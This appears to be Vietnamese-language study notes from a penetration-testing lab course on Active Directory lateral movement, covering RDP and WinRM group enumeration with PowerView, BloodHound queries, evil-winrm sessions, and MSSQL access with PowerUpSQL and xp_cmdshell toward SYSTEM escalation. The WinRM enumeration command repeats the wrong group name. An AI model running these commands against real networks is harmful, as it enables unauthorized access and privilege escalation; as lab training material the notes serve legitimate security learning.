Privileged Access

Remote Desktop

Thông thường nếu attacker có quyền control của local admin user (hoặc normal user) trên một host nhất định và access qua RDP. Sử dụng PowerView với Get-NetLocalGroupMember để enumerate member của Remote Desktop Users group.

Enumerating the Remote Desktop Users Group

Get-NetLocalGroupMember -ComputerName <computer name> -GroupName "Remote Desktop Users"

PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"

ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Desktop Users
MemberName   : INLANEFREIGHT\Domain Users
SID          : S-1-5-21-3842939050-3880317879-2865463114-513
IsGroup      : True
IsDomain     : UNKNOWN

Với MemberName của group này là toàn bộ Domain Users có thể access remote tới máy tính này.

Checking the Domain Users Group's Local Admin & Execution Rights using BloodHound

Nếu attacker controll được user thông qua LLMNR/NBT-NS Response Spoofing hoặc Kerberoasting có thể search username trong BloodHound để check loại quyền remote access mà họ trực tiếp hay kế thừa thông qua group membership trong Execution Rights của Node Info tab.

WinRM

Tương tự RDP:

Enumerating the Remote Management Users Group

Get-NetLocalGroupMember -ComputerName <computer name> -GroupName "Remote Desktop Users"

Có thể sử dụng Cypher query này trong BloodHound để search user.

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

Establishing WinRM Session from Windows

$password = ConvertTo-SecureString "<password>" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential ("domain\user", $password)
Enter-PSSession -ComputerName ACADEMY-EA-MS01 -Credential $cred

Establishing WinRM Session from Linux

Sử dụng evil-winrm để connect trên linux

gem install evil-winrm
evil-winrm -i <target IP> -u <user account>

SQL Server Admin

Sử dụng BloodHound để tìm loại access thông qua SQLAdmin edge. Ta có thể check được SQL Admin Rights trong tab Node Info .

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

Attacker có thể sử dụng quyền ACL của mình để authenticate với user A, thay đổi password cho user B và authenticate mục tiêu bằng PowerUpSQL

Enumerate MSSQL Instances

Import-Module .\PowerUpSQL.ps1
Get-SQLInstanceDomain

Sau đó, ta có thể authenticate remote SQL server và run các queries hoặc system commands.

Get-SQLQuery -Verbose -Instance "172.16.5.150,1433" -username "domain\user" -password "<password>" -query 'Select @@version'

Với linux sử dụng mssqlclient.py trong Impacket.

mssqlclient.py domain/user@<target MSSQL server IP> -windows-auth

Option enable_xp_cmdshell để bật xp_cmdshell stored procedure cho phép thực execute các system commands thông qua database nếu account đó có quyền.

Sau đó có thể chạy xp_cmdshell <command> để thực thi, từ đây có thể enumerate các quyền mà account có trên hệ thống, nếu có SeImpersonatePrivilege có thể tận dung với một số tools JuicyPotato, PrintSpoofer hoặc RoguePotato để escalate lên SYSTEM level.

xp_cmdshell whoami /priv
output                                                                             

--------------------------------------------------------------------------------   

NULL                                                                               

PRIVILEGES INFORMATION                                                             

----------------------                                                             

NULL                                                                               

Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    

SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    

SeImpersonatePrivilege        Impersonate a client after authentication Enabled    

SeCreateGlobalPrivilege       Create global objects                     Enabled    

SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   

NULL

PreviousDCSync NextKerberos "Double Hop" Problem

Last updated 1 month ago